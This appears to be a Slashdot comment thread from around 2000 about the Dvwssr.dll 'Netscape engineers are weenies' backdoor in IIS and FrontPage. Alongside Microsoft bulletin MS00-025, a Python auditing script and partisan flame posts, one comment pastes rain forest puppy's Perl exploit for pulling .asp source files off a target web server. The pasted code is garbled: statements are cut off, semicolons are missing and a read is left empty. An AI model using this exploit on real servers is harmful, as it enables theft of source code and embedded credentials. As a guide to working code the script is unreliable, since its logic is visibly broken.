If we don't leave space for the outsiders and the strange posters, don't we risk becoming a closed community, only expressing the ideas we already agree with?
Anything we do will be abused by a troll somewhere along the line. I'd be sorry to see us throw out the innovation baby out with the troll bathwater.
evilrooster - the email of the species is deadlier than the mail -
Where I have a say in what software goes on a computer (as in my home) Microsoft products are unwelcome, period. If they should decide to behave differently in the future, I might reconsider.
--DF.
Regardless of how you feel about the open source movement, doesn't this recent fiasco indicate that (veteran) computer users have a fear about trusting programs that aren't open to peer review? Just because this 'backdoor' was probably a misunderstanding doesn't mean that there aren't security problems with the current model of releasing only binaries.
What do you think the temptation is for someone at Microsoft, knowing the vast number of computers Windows is going to be preinstalled on, to intentionally add a flaw to a range check or otherwise backdoor the code in a less-than-obvious way? This can happen with open source too, of course, but with a greater risk of detection -- with closed source, we've got no choice but to accept that our vendors have our best interests at heart. And if that doesn't send chills up your spine...
Try not. Do or do not, there is no try.
-- Dr. Spock, stardate 2822-3.
Well the "Netscape engineers are weenies!" string
is really inside the dvwssr.dll thing.
Copying it to your Linux box and doing a
strings dvwssr.dll will show you the string
backwards :
C:\InetPub\wwwroot\_vti_bin\_vti_aut\dvwssr.dll
strings dvwssr.dll :
!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.idata
.rsrc
@.reloc
..
..
DVWSSR.DLL
DllMain
GetExtensionVersion
HttpExtensionProc
/global.asa
.asp
!seineew era sreenigne epacsteN
HTTP/1.0 404 Object Not Found
XWebScope Source Retriever
_refresh_acls_
Content-type: text/html
KERNEL32.dll
lstrcmpiA
lstrcpynA
CloseHandle
ReadFile
CreateFileA
lstrlenA
lstrcpyA
GetModuleFileNameA
lstrcmpA
..
..
Well seeing this makes me feel sick in the first
place. If we look at the exploit there is actually
something which makes use of that string. And
there is no discussion about that :
my $key="Netscape engineers are weenies!";
The complete exploit goes like this :
-----------------------------------------------
#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl target_host /file/to/retrieve/source
#
use Socket;
$ip=$ARGV[0];
$file=$ARGV[1];
print "Encoding to: ".encodefilename($file)."\n";
$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";
print sendraw($url);
sub encodefilename {
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
#
#
my $key="Netscape engineers are weenies!";
#
#
my $kc=length($from)
my ($fv,$kv,$tmp,$to,$lett)
@letts=split(//,$from);
foreach $lett (@letts){
$fv=index $slide, $lett;
$fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
$kv=index $slide, substr $key, $kc, 1;
if($kv>=0 && $fv>=0){
$tmp= $kv - $fv;
if($tmp = length($key)){ $kc=0;}
}return $to;}
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
-----------------------------------------------
Well this might be some juicy notes for judge Jackson, he might send Bill Gates to "Death Row"
for this. Well take it with a piece of salt I guess.
Anyway what makes me feel sick here too, are those
stupid www.questionexchange.com banner ads here.
I don't like them.
Robert
The anti-Slashdot lies need to stop. Slashdot ran the story based on many, many reports, including an admission from MS, that there was a hole. When the reports were found to be inaccurate, Slashdot posted that fact as well. There is no Slashdot conspiracy here -- there are just a lot of pseudo-radicals who think flaming makes them activists.
Facts:
- IIS w/ option pack HAS a "backdoor" with "netscapeengeniersareweenies" (or something like that).
- It allows every user with access to read all other users' .asp files. This seems not to be a bug!
- I HAVE SEEN IT WORK.
- So as it is, it would mostly affect web-hosting companies.
- BUT, Core-SDI's Gera and Beto have found a buffer overflow vulnerability.
- It lets ANYBODY on the internet crash an IIS with the mentioned option pack (called a DOS).
- It is demonstrated using a perl script posted on BUGTRAQ.
- It seems HIGHLY POSSIBLE to use THIS buffer overflow for arbitrary remote code execution.
- I HAVE SEEN IT WORK.
- So as it is, it affects ALL IIS w/ option pack4 on the net!!!
Notes: I'm the person who originally explored the security issues with Frontpage. My rantings are detailed (err, carved in stone unfortunately) on several security websites.
Incidentally, there is a rogue bit of code in the Visual interdev libs that ship with Frontpage 98 NT extensions. This code (as evidenced) allows backdooring of administrator access.
At no time were the Unix extensions vulnerable to this bit of code jockey arrogance.
Later...
this is simply more proof that even people who are in the "know" of MS software, still don't have a clue what the hell MS is doing:
Whatever it is, it appears to be meaningless junk text used as data.
pardon me for not sharing your apathy towards the subject, but perhaps we should let real programmers write real applications, and not half-hearted attempts at joke programs with "meaningless junk text" sprinkled in for laughs...
Hammer of Truth
Because we don't have the source to IIS, we couldn't check for ourselves, so when people who we trust more than MS (for good reason - they are somewhat unbiased) made an allegation we believed them.
That's the reason Open Source is better - the security experts (or us) could have checked the source, seen no real hole, retested the scenario, and seen what was really going on.
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-025)
- --------------------------------------
Procedure Available to Eliminate "Link View Server-Side Component"
Vulnerability
Originally Posted: April 14, 2000
Updated: April 17, 2000
Summary
=======
On April 14, 2000, Microsoft issued the original version of this
bulletin, to discuss a security vulnerability affecting several web
server products. Shortly after publishing the bulletin, we learned of
a new, separate vulnerability that increased the threat to users of
these products. We updated the bulletin later on April 14, 2000, to
advise customers of the new vulnerability, and noted that we would
provide additional details when known. On April 17, 2000, we updated
the bulletin again to provide those details.
A procedure is available to eliminate a security vulnerability that
could allow a malicious user to cause a web server to crash, or
potentially run arbitrary code on the server, if certain permissions
have been changed from their default settings to inappropriate ones.
Although this bulletin has been updated several times as the
investigation of this issue has progressed, the remediation steps
have always remained the same - customers running affected web servers
should delete the affected file, Dvwssr.dll. Customers who have done
this at any point in the past do not need to take any further action.
Frequently asked questions regarding this vulnerability and
the procedure can be found at
http://www.microsoft.com/technet/security/bulletin/fq00-025.asp
Issue
=====
Dvwssr.dll is a server-side component used to support the Link View
feature in Visual Interdev 1.0. However, it contains an unchecked
buffer. If overrun with random data, it could be used to cause an
affected server to crash, or could allow arbitrary code to run on the
server in a System context.
By default, the affected component, Dvwssr.dll, resides in a folder
whose permissions only allow web authors to execute it. Under these
conditions, only a person with web author privileges could exploit the
vulnerability - but a web author already has the ability to upload
and execute code of his choice, so this case represents little
additional threat. However, if the permissions on the folder were set
inappropriately, or the .dll were copied to a folder with lower
permissions, it could be possible for other users to execute the
component and exploit the vulnerability.
Affected Software Versions
==========================
The affected component is part of Visual Interdev 1.0. However, it is
a server-side component, and is included in the following products:
- Microsoft(r) Windows NT(r) 4.0 Option Pack, which is the
primary distribution mechanism for Internet Information
Server 4.0
- Personal Web Server 4.0, which ships as part of
Windows(r) 95 and 98
- Front Page 98 Server Extensions, which ships as part of
Front Page 98.
NOTE:
1. Windows 2000 is not affected by this vulnerability. Upgrading
from an affected Windows NT 4.0 to Windows 2000 removes the
vulnerability.
2. Installing Office 2000 Server Extensions on an affected server
removes this vulnerability.
3. Installing FrontPage 2000 Server Extensions on an affected
server removes this vulnerability.
Remediation
===========
To eliminate this vulnerability, customers who are hosting web sites
using any of the affected products should delete all copies of the
file Dvwssr.dll from their servers. The FAQ provides step-by-step
instructions for doing this. The only functionality lost by deleting
the file is the ability to generate link views of .asp pages using
Visual Interdev 1.0.
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-025,
http://www.microsoft.com/technet/security/bulletin/fq00-025.asp.
- Microsoft Knowledge Base article Q259799 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp.
Obtaining Support on this Issue
===============================
Information on contacting Microsoft Technical Support is available
at http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- April 14, 2000: Bulletin Created.
- April 14, 2000: Bulletin updated to provide preliminary results
of investigation of buffer overrun vulnerability.
- April 17, 2000: Bulletin updated to provide final results of
investigation.
- -------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED
"AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT
SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES
WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL,
LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT
CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF
LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING
LIMITATION MAY NOT APPLY.
Last updated April 17, 2000
(c) 2000 Microsoft Corporation. All rights reserved. Terms of use.
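An audit sketch for the bulletin's remediation ("delete all copies of the file Dvwssr.dll") and for the strings observation earlier in the thread, added here as an example; it is not code from any poster, from Microsoft or from NTBugtraq. It flags files by name and by the reversed marker seen in the quoted strings output, so renamed copies are caught too; the directory layout, file names other than dvwssr.dll, the size cap and the sample bytes are constructed assumptions.

```python
"""Audit a web root for copies of Dvwssr.dll, by file name and by content."""
import os
import re
import tempfile

# The marker exactly as the strings output in the thread shows it: stored reversed.
REVERSED_MARKER = b"!seineew era sreenigne epacsteN"
FORWARD_MARKER = REVERSED_MARKER[::-1]
TARGET_NAME = "dvwssr.dll"
MAX_SCAN_BYTES = 16 * 1024 * 1024  # assumption: skip content scan of larger files
# Printable-ASCII runs of 4+ bytes, the same default threshold strings(1) uses.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def printable_strings(data):
    """Return the printable runs a strings(1)-style pass would report."""
    return PRINTABLE_RUN.findall(data)


def classify(path):
    """Return the set of reasons this file looks like the affected component."""
    reasons = set()
    if os.path.basename(path).lower() == TARGET_NAME:
        reasons.add("name")  # NTFS names are case-insensitive, so compare lowered
    if os.path.getsize(path) > MAX_SCAN_BYTES:
        return reasons
    with open(path, "rb") as fh:
        data = fh.read()
    for run in printable_strings(data):
        if REVERSED_MARKER in run:
            reasons.add("marker-reversed")
        if FORWARD_MARKER in run:
            reasons.add("marker-forward")
    return reasons


def audit(root):
    """Walk root and map each suspicious relative path to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                reasons = classify(full)
            except OSError:
                continue  # unreadable file: report nothing rather than abort
            if reasons:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = reasons
    return dict(sorted(findings.items()))


def demo():
    """Run the audit over a constructed tree; no real DLL is involved."""
    sample = (b"MZ\x90\x00" + b"\x00" * 8 + b"/global.asa\x00.asp\x00"
              + REVERSED_MARKER + b"\x00HTTP/1.0 404 Object Not Found\x00")
    layout = {
        "_vti_bin/_vti_aut/dvwssr.dll": sample,   # default location
        "backup/old.bin": sample,                 # renamed copy, found by content
        "site2/DVWSSR.DLL": b"",                  # name match only
        "default.asp": b'<% Response.Write("hello") %>',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, content in layout.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(content)
        return audit(root)


if __name__ == "__main__":
    for path, why in demo().items():
        print(path, sorted(why))
```

A plain search for the forward text would miss the file, because the bytes on disk are reversed; that is why the audit checks both orientations.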
Precisely. That's why I use *nix -- winbloze has neither grep nor cron.
DNA is a Turing machine. You, however, being dynamic and emergent, are not.
Moderate it down, moderate correctly. I have to agree with the other posts about moderation.. What the hell is going on here. Enlighten me on what "If you stick your head in the ground and ignore or dismiss the negative actions of powerful entities, they will have no recourse but to continue with that course of action, because it's obvious nobody cares. It's the same with your average eight-year old. " means. So it means now if you bust your ass working on linux stuff and some corporation is still making millions life is good because you're not an 8 year old? Gimme a break people. Microsoft is Microsoft, you people BOUGHT their software or COMPUTERS with it on there. You could have bought OS/2, Apples, or even kept the faith in very advanced for its day NeXT Boxes or BeBoxes. The consumer was the one putting their faith in Microsoft. Should we sue McDonald's because it makes people fat and really tastes like shit but the commercials make me buy it or because it's the only joint on my block it's now unfair competition and they have to be sued until someone else with another shitty ass hamburger can come back in? My god. CHOICE PEOPLE! You chose a FUCKEN LAWYER to win your battle. Now think about that. You didn't choose NOT to run a Microsoft Product, you chose to waste money on supporting a government that is just as unruly and unjust as any corporation that exists. Fear the capitalism? Then move somewhere else or leave it be. DON'T take my choice! I still run Windows, I still run OS/2, I still use Linux. MY Choice. I didn't support nor write my legislature/senators to sue Microsoft, that is BS. I didn't buy a distro because THAT is BS. Buying something that *IS* free for the sake of Support? If the INFORMATION is free, why would you NEED support? If it was intuitive enough, what would be so hard that you need support????? Why should redhat get my money more so than Microsoft?
At least with Microsoft I see Innovative features such as the highly popular portals/email/mapping systems, kick ass gaming, ease of use, quick adaptation, forward looking and forward thinking design and gui concepts? I mean for the first time in computer la la land there is consistency and a huge market.
And we want to destroy that because people are naive and want to accept freedoms and not be forced to choose? Microsoft didn't FORCE windows. Microsoft didn't FORCE anything. They played the game and the lil boys lost.. wooopideee dooo. They acquired when Netscape could have acquired. Why didn't Netscape team up with IBM to compete with Microsoft? I won't even go any further, as it's pointless really..
AC, I am uncertain what you mean by multitask. Multitasking on a Macintosh was introduced with system 6 in the late 1980's. On my work Mac I run and use at least 1 web browser with several windows open, 1 email client, and 1 text editor (BBEdit) for HTML/code editing. In addition I may have some or _all_ of the following running at once: Photoshop, Illustrator, Acrobat 4 (not reader), Distiller, IE 2/3/4/5. Please let me know if you have a definition of Multi-tasking that means something other than running and using multiple programs at one time.
As far as rebooting when fatal errors occur, I fail to see how this is much different from a BSOD.
As far as FPU performance, weren't pc users claiming that integer performance was more important a few years ago before the G3 & G4 started mopping the floor with your asses? Please note comparisons where a G3 beats dual PII machines and single PIIIs.
I would also strongly advise that if you checked carefully you would find your head was lodged so far up your rectum that you could kiss your own heart.
Good day, sir.